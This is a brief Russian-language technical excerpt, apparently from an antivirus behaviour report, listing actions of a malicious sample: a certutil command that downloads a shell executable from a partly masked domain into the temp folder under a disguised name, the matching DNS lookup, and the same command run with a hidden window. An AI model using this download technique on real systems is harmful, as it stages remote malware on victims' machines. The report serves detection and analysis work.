Техническая информация
- '<SYSTEM32>\certutil.exe' -urlcache -split -f http://se###-dr3d.com/atkosshell.exe %TEMP%\shellcodepsp.com
- DNS ASK se###-dr3d.com
- '<SYSTEM32>\certutil.exe' -urlcache -split -f http://se###-dr3d.com/atkosshell.exe %TEMP%\shellcodepsp.com' (со скрытым окном)